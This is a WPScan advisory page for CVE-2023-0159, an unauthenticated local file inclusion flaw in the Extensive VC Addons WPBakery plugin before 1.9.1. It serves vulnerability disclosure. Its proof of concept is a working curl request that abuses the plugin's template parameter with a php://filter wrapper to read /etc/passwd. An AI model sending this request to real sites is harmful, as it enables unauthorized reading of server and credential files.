WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated LFI

Description

The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system.

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' \
    -d 'action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=/etc/passwd'

Affects Plugins

extensive-vc-addon
Fixed in version 1.9.1

References

CVE
CVE-2023-0159

Classification

Type

LFI

OWASP top 10
A1: Injection
CWE
CWE-22

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID
239ea870-66e5-4754-952e-74d4dd60b809

Timeline

Publicly Published

2023-01-25 (about 4 months ago)

Added

2023-01-23 (about 4 months ago)

Last Updated

2023-01-23 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin